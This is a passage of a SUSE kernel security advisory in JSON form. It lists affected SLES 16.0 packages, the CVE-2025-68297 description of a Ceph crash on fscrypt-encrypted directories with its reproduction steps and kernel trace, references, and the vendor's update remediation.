"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-68296"
},
{
"cve": "CVE-2025-68297",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68297"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nceph: fix crash in process_v2_sparse_read() for encrypted directories\n\nThe crash in process_v2_sparse_read() for fscrypt-encrypted directories\nhas been reported. Issue takes place for Ceph msgr2 protocol in secure\nmode. It can be reproduced by the steps:\n\nsudo mount -t ceph :/ /mnt/cephfs/ -o name=admin,fs=cephfs,ms_mode=secure\n\n(1) mkdir /mnt/cephfs/fscrypt-test-3\n(2) cp area_decrypted.tar /mnt/cephfs/fscrypt-test-3\n(3) fscrypt encrypt --source=raw_key --key=./my.key /mnt/cephfs/fscrypt-test-3\n(4) fscrypt lock /mnt/cephfs/fscrypt-test-3\n(5) fscrypt unlock --key=my.key /mnt/cephfs/fscrypt-test-3\n(6) cat /mnt/cephfs/fscrypt-test-3/area_decrypted.tar\n(7) Issue has been triggered\n\n[ 408.072247] ------------[ cut here ]------------\n[ 408.072251] WARNING: CPU: 1 PID: 392 at net/ceph/messenger_v2.c:865\nceph_con_v2_try_read+0x4b39/0x72f0\n[ 408.072267] Modules linked in: intel_rapl_msr intel_rapl_common\nintel_uncore_frequency_common intel_pmc_core pmt_telemetry pmt_discovery\npmt_class intel_pmc_ssram_telemetry intel_vsec kvm_intel joydev kvm irqbypass\npolyval_clmulni ghash_clmulni_intel aesni_intel rapl input_leds psmouse\nserio_raw i2c_piix4 vga16fb bochs vgastate i2c_smbus floppy mac_hid qemu_fw_cfg\npata_acpi sch_fq_codel rbd msr parport_pc ppdev lp parport efi_pstore\n[ 408.072304] CPU: 1 UID: 0 PID: 392 Comm: kworker/1:3 Not tainted 6.17.0-rc7+\n[ 408.072307] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS\n1.17.0-5.fc42 04/01/2014\n[ 408.072310] Workqueue: ceph-msgr ceph_con_workfn\n[ 408.072314] RIP: 0010:ceph_con_v2_try_read+0x4b39/0x72f0\n[ 408.072317] Code: c7 c1 20 f0 d4 ae 50 31 d2 48 c7 c6 60 27 d5 ae 48 c7 c7 f8\n8e 6f b0 68 60 38 d5 ae e8 00 47 61 fe 48 83 c4 18 e9 ac fc ff ff \u003c0f\u003e 0b e9 06\nfe ff ff 4c 8b 9d 98 fd ff ff 0f 84 64 e7 ff ff 89 85\n[ 408.072319] RSP: 0018:ffff88811c3e7a30 EFLAGS: 00010246\n[ 408.072322] RAX: ffffed1024874c6f RBX: ffffea00042c2b40 RCX: 0000000000000f38\n[ 408.072324] RDX: 0000000000000000 RSI: 0000000000000000 RDI: 0000000000000000\n[ 408.072325] RBP: ffff88811c3e7ca8 R08: 0000000000000000 R09: 00000000000000c8\n[ 408.072326] R10: 00000000000000c8 R11: 0000000000000000 R12: 00000000000000c8\n[ 408.072327] R13: dffffc0000000000 R14: ffff8881243a6030 R15: 0000000000003000\n[ 408.072329] FS: 0000000000000000(0000) GS:ffff88823eadf000(0000)\nknlGS:0000000000000000\n[ 408.072331] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n[ 408.072332] CR2: 000000c0003c6000 CR3: 000000010c106005 CR4: 0000000000772ef0\n[ 408.072336] PKRU: 55555554\n[ 408.072337] Call Trace:\n[ 408.072338] \u003cTASK\u003e\n[ 408.072340] ? sched_clock_noinstr+0x9/0x10\n[ 408.072344] ? __pfx_ceph_con_v2_try_read+0x10/0x10\n[ 408.072347] ? _raw_spin_unlock+0xe/0x40\n[ 408.072349] ? finish_task_switch.isra.0+0x15d/0x830\n[ 408.072353] ? __kasan_check_write+0x14/0x30\n[ 408.072357] ? mutex_lock+0x84/0xe0\n[ 408.072359] ? __pfx_mutex_lock+0x10/0x10\n[ 408.072361] ceph_con_workfn+0x27e/0x10e0\n[ 408.072364] ? metric_delayed_work+0x311/0x2c50\n[ 408.072367] process_one_work+0x611/0xe20\n[ 408.072371] ? __kasan_check_write+0x14/0x30\n[ 408.072373] worker_thread+0x7e3/0x1580\n[ 408.072375] ? __pfx__raw_spin_lock_irqsave+0x10/0x10\n[ 408.072378] ? __pfx_worker_thread+0x10/0x10\n[ 408.072381] kthread+0x381/0x7a0\n[ 408.072383] ? __pfx__raw_spin_lock_irq+0x10/0x10\n[ 408.072385] ? __pfx_kthread+0x10/0x10\n[ 408.072387] ? __kasan_check_write+0x14/0x30\n[ 408.072389] ? recalc_sigpending+0x160/0x220\n[ 408.072392] ? _raw_spin_unlock_irq+0xe/0x50\n[ 408.072394] ? calculate_sigpending+0x78/0xb0\n[ 408.072395] ? __pfx_kthread+0x10/0x10\n[ 408.072397] ret_from_fork+0x2b6/0x380\n[ 408.072400] ? __pfx_kthread+0x10/0x10\n[ 408.072402] ret_from_fork_asm+0x1a/0x30\n[ 408.072406] \u003c/TASK\u003e\n[ 408.072407] ---[ end trace 0000000000000000 ]---\n[ 408.072418] Oops: general protection fault, probably for non-canonical\naddress 0xdffffc00000000\n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68297",
"url": "https://www.suse.com/security/cve/CVE-2025-68297"
},
{
"category": "external",
"summary": "SUSE Bug 1255403 for CVE-2025-68297",
"url": "https://bugzilla.suse.com/1255403"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
